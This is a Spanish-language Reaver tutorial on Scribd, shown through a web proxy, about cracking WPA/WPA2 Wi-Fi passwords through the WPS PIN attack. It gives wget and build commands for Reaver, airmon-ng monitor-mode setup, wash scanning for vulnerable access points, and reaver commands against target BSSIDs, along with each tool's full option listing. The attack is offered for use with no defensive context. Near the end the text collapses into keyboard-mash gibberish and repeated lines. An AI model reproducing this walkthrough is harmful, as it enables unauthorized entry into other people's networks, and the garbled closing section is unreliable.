Scribd
Upload
197 views

Backtrack Reaver Tutorial

The document provides instructions for using the Reaver tool to crack WPA/WPA2 passwords on wireless networks that are vulnerable to the WPS PIN attack method. It explains how to install Reaver, use wash to find vulnerable networks, and run Reaver against a target access point by specifying its BSSID and channel.

Uploaded by

Joseph Russtriân
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
197 views

Backtrack Reaver Tutorial

The document provides instructions for using the Reaver tool to crack WPA/WPA2 passwords on wireless networks that are vulnerable to the WPS PIN attack method. It explains how to install Reaver, use wash to find vulnerable networks, and run Reaver against a target access point by specifying its BSSID and channel.

Uploaded by

Joseph Russtriân
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 5

Reaver Tutorial [wpa/wpa2]

*Reaver lo podes descargar aqui http://code.google.com/p/reaver-wps/downloads/list


O escribir en la terminalwget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
Luego Descomprimimostar -xvf reaver-1.4.tar.gz
Entramos en la carpetacd reaver-1.4/src
Despues lo instalamos con./configure
make
make install

Y listo ya lo tenemos instalado


Ahora a comprobar las redes vulnerables
* Ponemos nuestra targeta en modo monitor
airmon-ng start wlan0

*Para buscar las redes vulnerables escribimos


wash -i mon0

sintaxis de wash:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol
.com>
Required Arguments:
-i, --interface=<iface>
-f, --file [FILE1 FILE2 FILE3 ...]
Optional Arguments:
-c, --channel=<num>
-o, --out-file=<file>
-n, --probes=<num>
AP in scan mode [15]
-D, --daemonize
-C, --ignore-fcs
-5, --5ghz
-s, --scan
-u, --survey
-h, --help

Interface to capture packets on


Read packets from capture files

Channel to listen on [auto]


Write data to file
Maximum number of probes to send to each
Daemonize wash
Ignore frame checksum errors
Use 5GHz 802.11 channels
Use scan mode
Use survey mode [default]
Show help

Example:
wash -i mon0

*Anotamos los datos del wifi como el Access Point(B4:5D:3F:XX:XX:XX y canal


y luego ejecutamos reaver
Ejemplo:Uso: reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv
Sintaxis de Reaver
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol
.com>
Required Arguments:
-i, --interface=<wlan>
-b, --bssid=<mac>
Optional Arguments:
-m, --mac=<mac>
-e, --essid=<ssid>
-c, --channel=<channel>
lies -f)

Name of the monitor-mode interface to use


BSSID of the target AP

MAC of the host system


ESSID of the target AP
Set the 802.11 channel for the interface (imp

-o, --out-file=<file>
-s, --session=<file>
-C, --exec=<command>
pin recovery
-D, --daemonize
-a, --auto
target AP
-f, --fixed
-5, --5ghz
-v, --verbose
-q, --quiet
-h, --help
Advanced Options:
-p, --pin=<wps pin>
-d, --delay=<seconds>
-l, --lock-delay=<seconds>
attempts [60]
-g, --max-attempts=<num>
-x, --fail-wait=<seconds>
lures [0]
-r, --recurring-delay=<x:y>
-t, --timeout=<seconds>
-T, --m57-timeout=<seconds>
-A, --no-associate
t be done by another application)
-N, --no-nacks
ackets are received
-S, --dh-small
-L, --ignore-locks
-E, --eap-terminate
acket
-n, --nack
-w, --win7

Send output to a log file [stdout]


Restore a previous session file
Execute the supplied command upon successful
Daemonize reaver
Auto detect the best advanced options for the
Disable channel hopping
Use 5GHz 802.11 channels
Display non-critical warnings (-vv for more)
Only display critical messages
Show help

Use the specified 4 or 8 digit WPS pin


Set the delay between pin attempts [1]
Set the time to wait if the AP locks WPS pin
Quit after num pin attempts
Set the time to sleep after 10 unexpected fai
Sleep for y seconds every x pin attempts
Set the receive timeout period [5]
Set the M5/M7 timeout period [0.20]
Do not associate with the AP (association mus
Do not send NACK messages when out of order p
Use small DH keys to improve crack speed
Ignore locked state reported by the target AP
Terminate each WPS session with an EAP FAIL p
Target AP always sends a NACK [Auto]
Mimic a Windows 7 registrar [False]

Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

En mi caso me he tardado desde tres horas en sacar la clave wpa hasta 98 horas
Aqui les dejo algunos Y listo ya lo tenemos instalado
Ahora a comprobar las redes vulnerables
jhjbkjbfvkjbdkjfbvkjdnfv
jbjdbnfvjndflnvlkdnvkv

knvklndklvnkldnmvkmnmkm
* Ponemos nuestra targeta en modo monitor
airmon-ng start wlan0

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy